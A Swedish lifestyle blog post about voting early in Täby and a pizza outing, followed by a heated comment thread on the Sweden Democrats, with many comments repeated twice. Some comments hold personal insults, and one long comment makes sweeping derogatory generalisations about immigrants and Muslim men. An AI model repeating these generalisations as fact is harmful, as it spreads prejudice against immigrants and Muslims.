Röstat och klart!

Röstat & Klart! 

8CAA6F27-7CEC-4082-83E7-CCAD0A165C15

Ja… då har vi röstat.

Vi ville inte trängas med alla som skulle röstar imorgon. Så vi gjorde det innan.

Lite speciell känsla iår. Många tveksamheter, och en oro jag inte känt tidigare. Det enda jag vet till 100% är att SD INTE från min röst! Dom har en poäng i förtag viktiga frågor. Men that’s it!

Vi röstade i Täby Kommunhus.

Oavsett, vad, vem eller vilka du väljer att lägga din röst på. Så använd för guds skull din möjlighet att kunna lägga just din röst🙏🏻 För många av oss är det en självklar sak, att kunna rösta. Men långt ifrån alla har den möjligheten.

 Politik är politik. Jag kommer aldrig att föröka påverka dig till att tänka eller tycka som mig. Det cirkulerar socialdemokrats reklam här inne på våran bloggportal.

Det är inget personligt från mig. Utan banner, och puffar kommer ifrån portalen. Jag går inte ut med vad jag röstar på, eller ber dig att tycka/tänka som jag… 

 -Just saying! 😤 (Såg för övrigt  samma reklam hos Blondin Bella och några andre profiler )  

MEN, ta vara på din chans att lägg din röst❤️💙

Gick vidare till Jonas vänner på The Public. Titta vem vi hittade på Lenin ”Täby profilen” Fredrik Reinfeld pryder menyerna med Täby favoriter 💙 

867E6A42-71B3-4CCB-A201-07BD8D6F0C29 042EFD38-08E5-4B82-BD5A-5407E2AFE630

-Vi syndade!😍🍕

2D6CEBDD-8197-4877-8373-6D4E4A219BDC

Om man nu ändå ska ”synda” då ska pizzan vara sådär oförskämt god!

-Det är den på Public 😍🍕🙌🏻

F3DB9F03-BC7A-4C24-BCBF-44A742309812

Vi har även varit ute på en lååååång promenad. Sovit. Tittat på TVÅ filmer…… och haft en riktig mys-dag ❤️

73314FF2-B69F-417D-86BF-8633791A9FF9 D7360FB3-9912-40EF-90C5-F0108CCF5556

Nu ska vi se en film till!

-Hörs imorgon!

/My Martens 

94 Komentarer

  1. Värdefull information att du inte röstar SD. Tror tyvärr inte att någon bryr sig om vad du röstar på. Vad menar du med den här meningen:
    ”Dom har en poäng i förtag viktiga frågor.”?
    Du borde rösta på V för du behöver ju alla trygghetssystem som någon kan tänkas behöva. Kom inte dragandes igen med den där blombutiken och att du har stått på egna ben sedan 11-årsåldern. Orkar inte höra den dyngan igen.
    Du har skapat dig ett konstigt liv som gör att du inte kan jobba och försörja dig som vanliga människor. Då behöver du hjälp av vänstern. Hoppas att du röstade rätt.

    • Flärd… Slut på medicinen? Ingen som lyssnar på dig i riktiga livet?
      Måste in på en blogg och kräkas?
      Du, vet du vad? Spring en mil.
      Krama ett träd.
      Eller helt enkelt, håll din skit för dig själv.

  2. Tycker det har blivit en slags hetsjakt på folk som röstar på SD. Varför har alla offentliga personer, nästan iaf ett behov av att tala om att det INTE ska rösta på SD? Varför bryr man sig om vad folk ska rösta på?
    Att det blåser starka krafter o åsikter om SD har inte undgått någon men att hetsa på människor som röstar på dem är att gå för långt anser jag. För övrigt så såg pizzorna för jäkla goa ut ?

  3. My är inte en offentlig person hon skriver en blogg som en smal krets läser ibland.
    Min gissning är att SD får runt 25% i morgon helt oavsett vad My Martens tycker om detta. Att helt omotiverat uttala sig om att man bojkottar ett visst parti är rent ut sagt löjligt. Läs partiprogrammet och återkom men insikter efter det. Ja det är alltså en hälsning till de som hetsar emot SD.

    • Alla bloggare och A-kändisar som skådisar, programledare i TV4, musiker, alla skiter i valet dagen efter valdagen, men nu vill alla med hjälp av initialerna SD göra sig populära, det är det saken handlar om, My säger ”jag talar inte om vad jag röstar på” men det gör hon ju när hon säger ett parti som hon inte röstar på, är man neutral så nämner man inget parti överhuvudtaet, utan det är helt enkelt så att alla vill bli kändare och populärare för att tjäna egna pengar med hjälp av ordet SD för då tror de att de framstår som humana. De har en djävla dubbelmoral när de vill framhålla att de är sossar, eller moderater eller centerpartister, för de lever ett lyxliv som står långt ifrån den misär som finns bland nysvenskarna och folk från mellanöstern, om man nu är så mån om att få hit folk från mellanöstern och flyktingar, då lever man ju inget lyxliv utan istället DELAR med sig av sina tillgångar och pengar till dessa nytillkomna, och inte en enda av dem skulle ge avkall på sina lyxboenden, resor, dyra väskor, restaurangbesök, bilar, sommarställen, och sätta sig i den förort där de har satt alla nysvenskar, sådant djävla hyckleri! Såå avslöjade! De låtsas vara humana och lika för alla, men själva gör de inte avkall på ett skit till de som har det sämst ställt. En sak till, ge faen i att hålla högläsning om att ”gå och rösta” gå och rösta, bla bla bla, för faen vuxna människor behöver väl för faen inga bloggare som ska leka politiker fram till valdagen och som inte är ett skit insatta i politik, ni framstår bara som så oerhört töntiga. Åk istället ner till Rosengård, Nydala, Göteborg, ta in hur läget är där och ge avkall på erat eget lyxiga liv och skänk bort delar av er lön till dessa, i annat fall framstår ni bara som oerhört korkade och ointelligenta när ni försöker framhålla att allt är precis som det har varit. Inte en enda bloggare, tv 4 journalist, skådespelare, musiker, inte en enda har ställt sig frågan, hur i hela helvete ska vi få kontroll över den kriminalitet som har landet i ett järngrepp, och hur eller vem ska ingripa och skydda befolkningen när vi inte längre har det antal poliser som vi har haft tidigare?? Ingen har öppnat munnen och frågat sig hur detta ska ske?

    • Flärd.
      Jag tycker du ska läsa SD’s partiprogram.
      Skulle tro att 90%sv deras väljare INTE har gjort det.
      I deras partiprogram framgår helt klart vilken fruktansvärt vidrig människosyn de har.

      • Till M.
        Men jag är väl för faen inte någon väljare till SD!!. Har röstat på sossarna i varje val!! Däremot tycker jag alla kändisar är hycklare för de lever inte som de lär, men det gör däremot många av oss andra.. Jag skänker pengar trots att jag inte tjänar så mycket till människor i utsatta områden! Jag umgås med människor privat i dessa utsatta områden! Men HUR många av alla kändisar engagerar sig? Inte ett skit. Märkeskläder och lyxprylar och lägenheter inom tullarna är tydligen viktigare än att hjälpa de som kommer från andra länder och som inte äger någonting! Alla ska dela med sig, i synnerhet kändisar som tjänar så in i h-ete mycket pengar.

        • Förlåt… men nu lägger jag mig i. Det är lätt att generalisera mycket… men jag känner många ”kändisar” dvs, som genom sina jobb och karriärer är offentliga för svenska folket. Vissa bor innanför tullarna, andra utanför. Men dom flesta som jag känner jobbar med olika typer av välgörenhet, på ett sätt som man som privatperson inte kan mäta sig med. Då vissa offentliga personer, men många följare har en möjlighet att samla in stora summor pengar. Det tycker jag är en fin egenskap om du frågar mig…. Dessutom bara i min umgängeskrets så bidrar många av oss till olika organisationer som är i stort behov av hjälp ❤️ Tror inte att klädval, adress eller inkomst spelar någon roll. All som vill bidra, bidrar med det man själv kan….. och du påstår att ”dom inte bryr sig ett skit” vilket inte är sant….

          • Om de ”riktiga” A-kändisarna brydde sig så skulle de väl inte köpa miljonbostäder i stan, utan istället hyra en hyreslägenhet och istället skänka sina miljoner till nysvenskar. De skulle regelbundet lägga sina events i dessa förorter för att gagna förorterna, och bjuda in nysvenskarna, men detta görs aldrig. Alla dessa events i stan, varför bjuds aldrig dessa nysvenskar in från Afghanistan, Mellanöstern t.ex? Vi lever faktiskt i ett mångkulturellt samhälle idag, så upp till bevis istället och bjud in dessa människor, det är sådant som kallas integration! Varför kan inte dessa människor får lära sig blogga? Ni borde vara deras föredöme, åk ut till förorterna, leta upp dem, och lär upp dem att blogga t.ex, då kan de till och med sitta hemma och blogga och slipper betala dyra hyror inne i stan, men någon måste lära dem så klart, och det är eran skyldighet att ta ert ansvar för detta. Du skriver att du vill köpa hus, men om man är solidarisk med dessa nyanlända, då är det väl inte viktigaste att du kan köpa dig ett hus, utan det allra allra viktigaste är faktiskt att istället lägga dessa pengar till nysvenskarna, ni pratar bara och låtsas. Själv lägger jag 40 procent av min lön till familjer som är nysvenskar och som är fattiga, 40%!!

          • Jag delar inte din åsikt…. överhuvdtaget. Vill du lägga 40% på nyanlända så är det helt upp till dig.
            Men jag väljer att lägga mina pengar på att betala av av de lån som följde med konkursen. Jag betalar av och bygger upp inför mitt framtida husköp. Där vi ska skapa en framtid för oss, min son.. eventuellt fler barn och en trygg grund att utgå ifrån.
            Jag sparar även till min son. Hjälper min egen familj, och betalar såklart skatt, sociala avgifter och pension precis som alla andra. Förutom det så skänker jag pengar till välgörenhet, olika organisationer och jag jobbar ideellt gör flera av dom där jag årsvis drar in betydligt mer pengar med hjälp av min styrka genom mina sociala medier. Jag tänker inte skämmas eller ha dåligt samvete för att jag planerar att köpa ett hus. Eller för att jag sparar. Jag precis som många andra jobbar och kämpar hårt. Det är SÅ inskränkt att man ska behöva ta emot skit för att man inte skänker 40% av sin inkomst till nyanlända! Det är rent av korkat att vinkla det så…..

  4. Så onödigt att skriva att du inte röstar på SD varför skriva det överhuvudtaget. Eller är det viktigt för dig att alla nu vet detta. Nä My detta var dåligt.

  5. Värdefull information att du inte röstar SD. Tror tyvärr inte att någon bryr sig om vad du röstar på. Vad menar du med den här meningen:

    ”Dom har en poäng i förtag viktiga frågor.”?

    Du borde rösta på V för du behöver ju alla trygghetssystem som någon kan tänkas behöva. Kom inte dragandes igen med den där blombutiken och att du har stått på egna ben sedan 11-årsåldern. Orkar inte höra den dyngan igen.

    Du har skapat dig ett konstigt liv som gör att du inte kan jobba och försörja dig som vanliga människor. Då behöver du hjälp av vänstern. Hoppas att du röstade rätt.

    • Flärd… Slut på medicinen? Ingen som lyssnar på dig i riktiga livet?
      Måste in på en blogg och kräkas?
      Du, vet du vad? Spring en mil.
      Krama ett träd.
      Eller helt enkelt, håll din skit för dig själv.

  6. Tycker det har blivit en slags hetsjakt på folk som röstar på SD. Varför har alla offentliga personer, nästan iaf ett behov av att tala om att det INTE ska rösta på SD? Varför bryr man sig om vad folk ska rösta på?

    Att det blåser starka krafter o åsikter om SD har inte undgått någon men att hetsa på människor som röstar på dem är att gå för långt anser jag. För övrigt så såg pizzorna för jäkla goa ut 😛

  7. My är inte en offentlig person hon skriver en blogg som en smal krets läser ibland.

    Min gissning är att SD får runt 25% i morgon helt oavsett vad My Martens tycker om detta. Att helt omotiverat uttala sig om att man bojkottar ett visst parti är rent ut sagt löjligt. Läs partiprogrammet och återkom men insikter efter det. Ja det är alltså en hälsning till de som hetsar emot SD.

    • Alla bloggare och A-kändisar som skådisar, programledare i TV4, musiker, alla skiter i valet dagen efter valdagen, men nu vill alla med hjälp av initialerna SD göra sig populära, det är det saken handlar om, My säger ”jag talar inte om vad jag röstar på” men det gör hon ju när hon säger ett parti som hon inte röstar på, är man neutral så nämner man inget parti överhuvudtaet, utan det är helt enkelt så att alla vill bli kändare och populärare för att tjäna egna pengar med hjälp av ordet SD för då tror de att de framstår som humana. De har en djävla dubbelmoral när de vill framhålla att de är sossar, eller moderater eller centerpartister, för de lever ett lyxliv som står långt ifrån den misär som finns bland nysvenskarna och folk från mellanöstern, om man nu är så mån om att få hit folk från mellanöstern och flyktingar, då lever man ju inget lyxliv utan istället DELAR med sig av sina tillgångar och pengar till dessa nytillkomna, och inte en enda av dem skulle ge avkall på sina lyxboenden, resor, dyra väskor, restaurangbesök, bilar, sommarställen, och sätta sig i den förort där de har satt alla nysvenskar, sådant djävla hyckleri! Såå avslöjade! De låtsas vara humana och lika för alla, men själva gör de inte avkall på ett skit till de som har det sämst ställt. En sak till, ge faen i att hålla högläsning om att ”gå och rösta” gå och rösta, bla bla bla, för faen vuxna människor behöver väl för faen inga bloggare som ska leka politiker fram till valdagen och som inte är ett skit insatta i politik, ni framstår bara som så oerhört töntiga. Åk istället ner till Rosengård, Nydala, Göteborg, ta in hur läget är där och ge avkall på erat eget lyxiga liv och skänk bort delar av er lön till dessa, i annat fall framstår ni bara som oerhört korkade och ointelligenta när ni försöker framhålla att allt är precis som det har varit. Inte en enda bloggare, tv 4 journalist, skådespelare, musiker, inte en enda har ställt sig frågan, hur i hela helvete ska vi få kontroll över den kriminalitet som har landet i ett järngrepp, och hur eller vem ska ingripa och skydda befolkningen när vi inte längre har det antal poliser som vi har haft tidigare?? Ingen har öppnat munnen och frågat sig hur detta ska ske?

    • Flärd.
      Jag tycker du ska läsa SD’s partiprogram.
      Skulle tro att 90%sv deras väljare INTE har gjort det.
      I deras partiprogram framgår helt klart vilken fruktansvärt vidrig människosyn de har.

      • Till M.

        Men jag är väl för faen inte någon väljare till SD!!. Har röstat på sossarna i varje val!! Däremot tycker jag alla kändisar är hycklare för de lever inte som de lär, men det gör däremot många av oss andra.. Jag skänker pengar trots att jag inte tjänar så mycket till människor i utsatta områden! Jag umgås med människor privat i dessa utsatta områden! Men HUR många av alla kändisar engagerar sig? Inte ett skit. Märkeskläder och lyxprylar och lägenheter inom tullarna är tydligen viktigare än att hjälpa de som kommer från andra länder och som inte äger någonting! Alla ska dela med sig, i synnerhet kändisar som tjänar så in i h-ete mycket pengar.

        • Förlåt… men nu lägger jag mig i. Det är lätt att generalisera mycket… men jag känner många ”kändisar” dvs, som genom sina jobb och karriärer är offentliga för svenska folket. Vissa bor innanför tullarna, andra utanför. Men dom flesta som jag känner jobbar med olika typer av välgörenhet, på ett sätt som man som privatperson inte kan mäta sig med. Då vissa offentliga personer, men många följare har en möjlighet att samla in stora summor pengar. Det tycker jag är en fin egenskap om du frågar mig…. Dessutom bara i min umgängeskrets så bidrar många av oss till olika organisationer som är i stort behov av hjälp ❤️ Tror inte att klädval, adress eller inkomst spelar någon roll. All som vill bidra, bidrar med det man själv kan….. och du påstår att ”dom inte bryr sig ett skit” vilket inte är sant….

          • Om de ”riktiga” A-kändisarna brydde sig så skulle de väl inte köpa miljonbostäder i stan, utan istället hyra en hyreslägenhet och istället skänka sina miljoner till nysvenskar. De skulle regelbundet lägga sina events i dessa förorter för att gagna förorterna, och bjuda in nysvenskarna, men detta görs aldrig. Alla dessa events i stan, varför bjuds aldrig dessa nysvenskar in från Afghanistan, Mellanöstern t.ex? Vi lever faktiskt i ett mångkulturellt samhälle idag, så upp till bevis istället och bjud in dessa människor, det är sådant som kallas integration! Varför kan inte dessa människor får lära sig blogga? Ni borde vara deras föredöme, åk ut till förorterna, leta upp dem, och lär upp dem att blogga t.ex, då kan de till och med sitta hemma och blogga och slipper betala dyra hyror inne i stan, men någon måste lära dem så klart, och det är eran skyldighet att ta ert ansvar för detta. Du skriver att du vill köpa hus, men om man är solidarisk med dessa nyanlända, då är det väl inte viktigaste att du kan köpa dig ett hus, utan det allra allra viktigaste är faktiskt att istället lägga dessa pengar till nysvenskarna, ni pratar bara och låtsas. Själv lägger jag 40 procent av min lön till familjer som är nysvenskar och som är fattiga, 40%!!

          • Jag delar inte din åsikt…. överhuvdtaget. Vill du lägga 40% på nyanlända så är det helt upp till dig.

            Men jag väljer att lägga mina pengar på att betala av av de lån som följde med konkursen. Jag betalar av och bygger upp inför mitt framtida husköp. Där vi ska skapa en framtid för oss, min son.. eventuellt fler barn och en trygg grund att utgå ifrån.

            Jag sparar även till min son. Hjälper min egen familj, och betalar såklart skatt, sociala avgifter och pension precis som alla andra. Förutom det så skänker jag pengar till välgörenhet, olika organisationer och jag jobbar ideellt gör flera av dom där jag årsvis drar in betydligt mer pengar med hjälp av min styrka genom mina sociala medier. Jag tänker inte skämmas eller ha dåligt samvete för att jag planerar att köpa ett hus. Eller för att jag sparar. Jag precis som många andra jobbar och kämpar hårt. Det är SÅ inskränkt att man ska behöva ta emot skit för att man inte skänker 40% av sin inkomst till nyanlända! Det är rent av korkat att vinkla det så…..

  8. Mycket tråkigt att höra denna kommentar: ”du har skapat dig ett konstigt liv som gör att du inte kan försörja dig som vanliga människor”. Varför måste människor vara vanliga och kan inte gå sin egen väg? Det känns fruktansvärt marxistiskt vänstervridet och inte alls nyskapande och hälsobringande. Man måste kanske ta många motgångar för att slutligen bli en vinnare.

  9. Så onödigt att skriva att du inte röstar på SD varför skriva det överhuvudtaget. Eller är det viktigt för dig att alla nu vet detta. Nä My detta var dåligt.

  10. Imorgon ska jag stolt gå och rösta på SD! I alla mätningar får dom runt 19-24 % så vi är väldigt många som kommer att rösta på SD. Tror vi hamnar runt 21-22 % men mina förhoppningar är ju självklart ännu mer.
    Men det viktigaste är ju att vi får ett regeringsskifte och avsätter den rödgröna röran som kört Sverige i botten med fördubblade vårdköer, dåliga skolresultat, fattigpensionärer och för att inte tala om den oansvariga asylinvandringen! Det behövs en förändring på riktigt i svensk politik!!!

  11. Mycket tråkigt att höra denna kommentar: ”du har skapat dig ett konstigt liv som gör att du inte kan försörja dig som vanliga människor”. Varför måste människor vara vanliga och kan inte gå sin egen väg? Det känns fruktansvärt marxistiskt vänstervridet och inte alls nyskapande och hälsobringande. Man måste kanske ta många motgångar för att slutligen bli en vinnare.

  12. Imorgon ska jag stolt gå och rösta på SD! I alla mätningar får dom runt 19-24 % så vi är väldigt många som kommer att rösta på SD. Tror vi hamnar runt 21-22 % men mina förhoppningar är ju självklart ännu mer.
    Men det viktigaste är ju att vi får ett regeringsskifte och avsätter den rödgröna röran som kört Sverige i botten med fördubblade vårdköer, dåliga skolresultat, fattigpensionärer och för att inte tala om den oansvariga asylinvandringen! Det behövs en förändring på riktigt i svensk politik!!!

  13. Det har verkligen gått till överdrift denna hets mot SD att rösträtt innebär att var och en själv får bestämma. Varför tala om att du inte ska rösta på SD om du med det inte vill försöka påverka även om ingen nog bryr sig, i sådana fall ska man väl också tala om vad man röstar varför inte?

    • Folk som säger att dom inte ska rösta på SD förväntar sig klapp på axeln o att folk ska tro man är en bra människa.. ingen rasist . Men det roliga är att det t.o.m finns utlänningar som röstar på SD.är dom rasist mot sig själva?
      Jag ska rösta idag o SJÄLVKLART får SD min röst.

  14. Ja det verkar vara väldigt viktigt för vissa att säga att ” jag röstar iallafall inte på SD men i övrigt tänker jag inte säga vad jag röstar på”.
    Ungefär som att gardera sig folk ska veta att jag inte är en ”dålig”människa , vilket verkar vara synonymt med att rösta på dem.
    Är alla som röstar på dem elaka, osympatiska och rasistiska människor? Behöver det verkligen vara så? Jag kan med hundra procents säkerhet säga att det inte är så.

  15. Tycker inte att det är konstigt att ta avstånd från SD. Dom är ett främlingsfientligt parti. Dom som har missat det får gå tillbaka o titta på tidigare debatter. SD vill oxå få igenom andra saker som för mig är att gå tillbaka i samhället.

    • Nej dem är inte främlingsfientliga eller rasister, däremot förespråkar SD att om man kommer till ett annat land, respekterar man lagar o regler i det landet,samt tar inte för givet att det finns hur mycket bidrag som helst. Detsamma gäller för oss, om vi flyttar eller besöker ett annat land.

      • Monica
        Tycker nog du ska ta och läsa SD’s partiprogram.
        De är inte bara främlingsfientliga utan rent ut sagt människofientliga.
        Tänk på att även du som svensk omfattas av att kunna mista ditt svenska medborgarskap om du t ex skulle vilja byta religion eller kön eller helt enkelt ha en åsikt som inte passar. Frågan är då HUR ska de leta reda på dessa människor och VAD ska de göra med dem. Fängsla dem, avlivning eller vad? Folk får rösta på vad de vill för mig och jag har ställt ovanstående fråga till flera SD;are och eftersom ingen kunnat (eller velat) svara, varken på detta eller annat, så går det partiet helt bort för mig. Jag har ett råd till alla, lyssna inte bara till vad som sägs, läs partiprogrammen och försök sätta er in i tankegångarna bakom det som skrivs.

        • M, Du är en sån som just folk som tolkar koranen, precis det som passar en bäst. Har du ens pratat med en kvinna som flytt sitt land, varför? NEJ! Du kallar indirekt folk som röstar på SD för rasister, nazister och människofientliga. Mina vänner, många av dom från olika arabtalande länder tänker rösta på SD. Vet du varför? För att Sverige släpper in allt och alla. Dom som genuint flyr sina länder för deras liv vill inte att det land dom kommer till ska bli ett land dom flytt från vilket är på god väg. Du kanske missade att man nu KRÄVER månggifte, barngifte, böneutrop och att deras religion ska bli den enda religonen. Vi ska ta bort korsen i sjukhuskyrkorna för att dom ska kunna be där inne. Tycker du på allvar att dom som flytt och inte vill ha det som det dom flydde ifrån ska bli tvingade till just det? Vet du att en vän till mig är ganska vanskapt pga att hon fick syra kastat på sig och stenades nästan till döds för att hon satt i ett rum där en man gick in i. Hon drabbades av det och fick skit fast hon inte gjort ett enda fel. En annan jag känner har inget underliv kvar för dom måste könsstympas. Hon visste inte hur hon skulle kunna föda barn för hon var i princip ihopsydd från ände till ände så när som ett hål, ja du förstår nog. Sen har jag hört historier från just folk från dessa länder, inte från dig som förmodligen inte känner en enda invandrare som har haft ett helvete. Jag antar att du är för månggifte och barngiftemål där barnen föder barn vid 12 år. Kvinnor är inte värde något, har ingenting att säga till om, blir mördade om dom inte lyder. Kvinnomisshandeln bland dom är extrem. Hemska människa som verkar tycka att män ska styra över kvinnan och kvinnan får inte göra något, barn blir bortgifta, galenskap. Sen en sak du kan tala om för mig som tycker det är så bra det här. Det är övervägande män som kommer till Sverige, lämnar sina barn, sin hustru kvar i hemlandet för att ta sig till Sverige utan att veta om barn och hustru lever eller dör. Vilken normal man skulle göra det? Tycker du på fullaste allvar att det är ok att lämna sina små barn bland bomber och skjutningar för att ta sig till Sverige? Så förbaskat sjukt. Skulle du sätta på dina barn bombvästar och låta dom sprängas i luften? Du förnedrar våra invandrarkvinnor som flytt från allt detta. Nästan alla säger att dom inte vill ha hucklen på huvudet men måste för männen. Dom flydde hit och trodde dom skulle slippa men vad händer? Jo, säkert såna som du står och demonstrerar att dom ska få ha sin huckle på sig, det är inte vi som ska bestämma. Det är inte DOM som vill ha det på sig, det är deras män som kräver. När fan ska ni fatta nått. Jag kommer aldrig acceptera pedofili, aldrig acceptera kvinnoförnedring, våld, stenkastning på våra brandmän, ambulansmän, kvinnor och barn, bilbränder och att dom tar över våra städer och har parallella städer i städerna. Det säger till och med alla partier utom V såklart, vidriga varelser men det tror väl inte du på. Fast en sån fanatisk människa som dig och dina gelikar går det aldrig att prata med, diskutera med för ni tycker sånt här är helt ok bara dom får komma hit. Den dag du drabbas eller dina nära och kära, säg för sjutton inte ett ord då. Inte ett enda.

          • Jag säger att SD är människofientliga. Jag hoppas innerligt att de invandrare som röstar på SD läst deras partiprogram. Jag har många invandrare i min närhet och ingen enda av dem tänker rösta på SD. Allt det du beskriver det är ju exakt vad SD vill ha det tillbaka till eftersom de vill skicka hem en stor del och att de vill hjälpa på plats istället. Det kommer inte att ändra tillvaron för de som utsätts för de hemskheter du beskriver.
            T o m invandrare jag pratar med gillar inte när folk (som du) säger att de bl a kräver att det ska finnas barnäktenskap. Det gör de inte. Det förekommet barnäktenskap men vi har lagar mot det och månggifte, och alla må ju följa lagen.
            De som kräver saker nu skulle säkert fortsätta göra det även med SD vid makten.
            Jag är verkligen ingen rasist men är övertygad om ändå att 90% av SD’ s väljare har inte läst deras partiprogram och HAR de läst då har de nog inte förstått vad det står.
            Jag har bögar, flator, trans och bipersoner, araber, muslimer, asiater och t o m SD som vänner så kalla inte mig rasist!
            Alla får ha sin åsikt. Detta är min och därmed punkt från min sida.

    • Fast Lena, nu handlade ju inte tråden om huruvida hemska, rasistiska SD är. Det handlar om varför folk har sådana behov av att tala om att just hen minsann inte röstar på SD. Någon skrev att de är precis som om att få en ”klapp på axeln” som talar om att ok cdu är ingen hemsk människa för du röstar ju inte på SD.
      Det är det jag tycker är så konstigt. Varför blanda in det? Gör vad du ska, gå o rösta och vill du berätta vad du röstat på så gör det. Annars kan du du ju dra upp att jag röstade inte på kd, S, M, Liberalerna, V, mp, C, liksom. Varför säga just SD? Det är det som är iaf min poäng.
      Vill oxå säga att detta är inget påhopp mot just my. Här finns några fula kommentarer som handlar om själva my o det tar jag avstånd ifrån. Man måste väl få reflektera saker på ett vettigt sätt. Jag följer bloggen o tänker att jag ville lyfta ämnet då jag en längre tid sett på olika sociala medier just detta o jag tycker det är lite skevt helt enkelt.
      Peace❤️

      • Så bra och klokt skrivet Charlotte helt enig, har inte sett någon skriva att något av de andra partierna inte fick deras röst handlar bara om SD hela tiden.

        • Flärd… Slut på medicinen? Ingen som lyssnar på dig i riktiga livet?
          Måste in på en blogg och kräkas?
          Du, vet du vad? Spring en mil.
          Krama ett träd.
          Eller helt enkelt, håll din skit för dig själv.

        • Men på riktigt, förstår ni inte det?
          Det är ett extremt parti som har en människosyn som dom flesta inte vill ha att göra med. Dessutom visar det sig att många som röstar på SD inte direkt har så mycket studieskulder…
          ”SD tycker vi har för mycket invandrare, dom röstar vi på” typ.
          Därför kära ni tycker många att dom vill tala om att dom inte röstar på SD. Fatta?

  16. Det har verkligen gått till överdrift denna hets mot SD att rösträtt innebär att var och en själv får bestämma. Varför tala om att du inte ska rösta på SD om du med det inte vill försöka påverka även om ingen nog bryr sig, i sådana fall ska man väl också tala om vad man röstar varför inte?

    • Folk som säger att dom inte ska rösta på SD förväntar sig klapp på axeln o att folk ska tro man är en bra människa.. ingen rasist . Men det roliga är att det t.o.m finns utlänningar som röstar på SD.är dom rasist mot sig själva?
      Jag ska rösta idag o SJÄLVKLART får SD min röst.

  17. Ja det verkar vara väldigt viktigt för vissa att säga att ” jag röstar iallafall inte på SD men i övrigt tänker jag inte säga vad jag röstar på”.
    Ungefär som att gardera sig folk ska veta att jag inte är en ”dålig”människa , vilket verkar vara synonymt med att rösta på dem.
    Är alla som röstar på dem elaka, osympatiska och rasistiska människor? Behöver det verkligen vara så? Jag kan med hundra procents säkerhet säga att det inte är så.

  18. Tycker inte att det är konstigt att ta avstånd från SD. Dom är ett främlingsfientligt parti. Dom som har missat det får gå tillbaka o titta på tidigare debatter. SD vill oxå få igenom andra saker som för mig är att gå tillbaka i samhället.

    • Nej dem är inte främlingsfientliga eller rasister, däremot förespråkar SD att om man kommer till ett annat land, respekterar man lagar o regler i det landet,samt tar inte för givet att det finns hur mycket bidrag som helst. Detsamma gäller för oss, om vi flyttar eller besöker ett annat land.

      • Monica
        Tycker nog du ska ta och läsa SD’s partiprogram.
        De är inte bara främlingsfientliga utan rent ut sagt människofientliga.
        Tänk på att även du som svensk omfattas av att kunna mista ditt svenska medborgarskap om du t ex skulle vilja byta religion eller kön eller helt enkelt ha en åsikt som inte passar. Frågan är då HUR ska de leta reda på dessa människor och VAD ska de göra med dem. Fängsla dem, avlivning eller vad? Folk får rösta på vad de vill för mig och jag har ställt ovanstående fråga till flera SD;are och eftersom ingen kunnat (eller velat) svara, varken på detta eller annat, så går det partiet helt bort för mig. Jag har ett råd till alla, lyssna inte bara till vad som sägs, läs partiprogrammen och försök sätta er in i tankegångarna bakom det som skrivs.

        • M, Du är en sån som just folk som tolkar koranen, precis det som passar en bäst. Har du ens pratat med en kvinna som flytt sitt land, varför? NEJ! Du kallar indirekt folk som röstar på SD för rasister, nazister och människofientliga. Mina vänner, många av dom från olika arabtalande länder tänker rösta på SD. Vet du varför? För att Sverige släpper in allt och alla. Dom som genuint flyr sina länder för deras liv vill inte att det land dom kommer till ska bli ett land dom flytt från vilket är på god väg. Du kanske missade att man nu KRÄVER månggifte, barngifte, böneutrop och att deras religion ska bli den enda religonen. Vi ska ta bort korsen i sjukhuskyrkorna för att dom ska kunna be där inne. Tycker du på allvar att dom som flytt och inte vill ha det som det dom flydde ifrån ska bli tvingade till just det? Vet du att en vän till mig är ganska vanskapt pga att hon fick syra kastat på sig och stenades nästan till döds för att hon satt i ett rum där en man gick in i. Hon drabbades av det och fick skit fast hon inte gjort ett enda fel. En annan jag känner har inget underliv kvar för dom måste könsstympas. Hon visste inte hur hon skulle kunna föda barn för hon var i princip ihopsydd från ände till ände så när som ett hål, ja du förstår nog. Sen har jag hört historier från just folk från dessa länder, inte från dig som förmodligen inte känner en enda invandrare som har haft ett helvete. Jag antar att du är för månggifte och barngiftemål där barnen föder barn vid 12 år. Kvinnor är inte värde något, har ingenting att säga till om, blir mördade om dom inte lyder. Kvinnomisshandeln bland dom är extrem. Hemska människa som verkar tycka att män ska styra över kvinnan och kvinnan får inte göra något, barn blir bortgifta, galenskap. Sen en sak du kan tala om för mig som tycker det är så bra det här. Det är övervägande män som kommer till Sverige, lämnar sina barn, sin hustru kvar i hemlandet för att ta sig till Sverige utan att veta om barn och hustru lever eller dör. Vilken normal man skulle göra det? Tycker du på fullaste allvar att det är ok att lämna sina små barn bland bomber och skjutningar för att ta sig till Sverige? Så förbaskat sjukt. Skulle du sätta på dina barn bombvästar och låta dom sprängas i luften? Du förnedrar våra invandrarkvinnor som flytt från allt detta. Nästan alla säger att dom inte vill ha hucklen på huvudet men måste för männen. Dom flydde hit och trodde dom skulle slippa men vad händer? Jo, säkert såna som du står och demonstrerar att dom ska få ha sin huckle på sig, det är inte vi som ska bestämma. Det är inte DOM som vill ha det på sig, det är deras män som kräver. När fan ska ni fatta nått. Jag kommer aldrig acceptera pedofili, aldrig acceptera kvinnoförnedring, våld, stenkastning på våra brandmän, ambulansmän, kvinnor och barn, bilbränder och att dom tar över våra städer och har parallella städer i städerna. Det säger till och med alla partier utom V såklart, vidriga varelser men det tror väl inte du på. Fast en sån fanatisk människa som dig och dina gelikar går det aldrig att prata med, diskutera med för ni tycker sånt här är helt ok bara dom får komma hit. Den dag du drabbas eller dina nära och kära, säg för sjutton inte ett ord då. Inte ett enda.

          • Jag säger att SD är människofientliga. Jag hoppas innerligt att de invandrare som röstar på SD läst deras partiprogram. Jag har många invandrare i min närhet och ingen enda av dem tänker rösta på SD. Allt det du beskriver det är ju exakt vad SD vill ha det tillbaka till eftersom de vill skicka hem en stor del och att de vill hjälpa på plats istället. Det kommer inte att ändra tillvaron för de som utsätts för de hemskheter du beskriver.
            T o m invandrare jag pratar med gillar inte när folk (som du) säger att de bl a kräver att det ska finnas barnäktenskap. Det gör de inte. Det förekommet barnäktenskap men vi har lagar mot det och månggifte, och alla må ju följa lagen.
            De som kräver saker nu skulle säkert fortsätta göra det även med SD vid makten.
            Jag är verkligen ingen rasist men är övertygad om ändå att 90% av SD’ s väljare har inte läst deras partiprogram och HAR de läst då har de nog inte förstått vad det står.
            Jag har bögar, flator, trans och bipersoner, araber, muslimer, asiater och t o m SD som vänner så kalla inte mig rasist!
            Alla får ha sin åsikt. Detta är min och därmed punkt från min sida.

